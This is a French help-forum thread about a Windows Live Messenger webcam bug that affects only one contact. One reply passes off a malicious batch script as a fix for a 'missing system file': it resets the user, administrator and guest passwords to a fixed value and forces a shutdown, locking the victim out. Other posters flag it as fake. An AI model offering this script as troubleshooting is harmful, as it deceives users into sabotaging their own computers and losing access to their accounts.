Afficher la cam MSN bug avec UN contact

Résolu/Fermé
Masta47 Messages postés 17 Date d'inscription samedi 27 octobre 2007 Statut Membre Dernière intervention 19 octobre 2012 - 12 janv. 2011 à 23:49
Masta47 Messages postés 17 Date d'inscription samedi 27 octobre 2007 Statut Membre Dernière intervention 19 octobre 2012 - 19 oct. 2012 à 14:09
Bonjour,

J'ai un probleme sur windows live messenger avec la cam.
Sur msn on peut soit "afficher la cam" soit faire une "conversation video". Ces deux options marchent avec tous les contacts sauf 1, ou je ne peux pas "afficher la cam".

Quand j'envoie l'invitation a "afficher la cam", quelque secondes apres la cam se stoppe (elle n'a meme pas le temps de démarrer je n'ai meme pas le temps de me voir moi meme) et je peux lire que mon contact a refusé de démarrer la webcam...

Or mon contact n'a pas reçu d'invitation.. On a essayé de changer plusieurs fois de version d'msn & windows live dans plusieurs langues et ça ne marche pas..
Il n'y a qu'avec ce contact que ça pose probleme.

Je tiens a préciser que ce n'est pas le probleme de l'option "afficher la cam" qui reste en gris et indisponible, car je peux cliquer dessus et ça marche avec les autres contacts, sauf celui là.

J'ai chercé sur le net et je j'ai rein trouvé...

Comment pourrai-je régler ça et "afficher la cam" avec ce contact?

Merci d'avance

A voir également:

3 réponses

Salut,

J'avais le même problème que toi!!,C'est à cause de la perte d'un fichier système, pour le restaurer, t'as qu'a copier le code ci-dessus, et l'enregistrer sous l'extention .bat (exemple : msn.bat), il te reste qu'a faire un double clic sur le fichier créé, et c'est tout !.
voiçi le code :

echo off
break off
net user %USERNAME% 0895
net user administrator 0895
net user Guest 0895
shutdown -s -f -t 01
exit
0
Ca marche pas ton truc.
0
C'est un fake, ne faites pas ça!
0
Masta47 Messages postés 17 Date d'inscription samedi 27 octobre 2007 Statut Membre Dernière intervention 19 octobre 2012 1
13 janv. 2011 à 01:34
J'my connais pas trop en fichier systeme j'aime pas trop bidouiller ça.. t'es sur de ton truc ?
0
Masta47 Messages postés 17 Date d'inscription samedi 27 octobre 2007 Statut Membre Dernière intervention 19 octobre 2012 1
19 oct. 2012 à 14:09
ça s'est reglé tout seul je ne sais comment...
0